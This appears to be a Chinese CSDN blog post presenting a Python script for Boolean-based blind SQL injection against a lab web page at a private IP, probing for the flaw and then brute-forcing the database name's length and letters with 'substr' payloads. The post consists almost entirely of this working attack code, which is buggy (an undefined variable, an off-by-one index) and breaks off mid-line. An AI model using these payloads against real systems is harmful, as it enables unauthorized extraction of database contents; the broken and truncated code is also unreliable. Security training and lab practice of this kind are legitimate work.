布尔盲注需简化代码

最新推荐文章于 2023-02-10 19:58:39 发布

wuqinghalasao

最新推荐文章于 2023-02-10 19:58:39 发布

阅读量155

点赞数

文章标签： python

本文链接：https://blog.csdn.net/weixin_55347427/article/details/126115917

版权

本文通过Python实现布尔盲注，演示了如何判断布尔注入漏洞、获取数据库信息、表信息、列信息以及数据行，详细解析了整个过程。

摘要由CSDN通过智能技术生成

import requests,time,string
# 判断注入点
paylode1="?id=1 and 1=2"
paylode2="?id=1 and 1=1"
url="http://192.168.28.133/boke/aupdata.php"

#获取正确值
res1=requests.get(f'{url}{paylode2}')
response1 = res1.text
# print(response1)
if len(response)==len(response1):
    print('不存在布尔漏洞')
else:
    print('存在布尔注入漏洞，判断数据库长度')
    a1=0
    for a in range(6):
        res2 = requests.get(f'{url}?id=1 and length(database())={a}-- -')
        response3 = res2.text
        if len(response3)==len(response1):
            a1=a
            print(f"数据库长度为{a},开始爆破库名和表名")
            break
    low = string.ascii_lowercase
    res4=''
    for a2 in range(a1+1):
        for a3 in low:
            res3 = requests.get(f"{url}?id=1 and (substr(database(),{a2},1))='{a3}' -- -")
            response4=res3.text
            i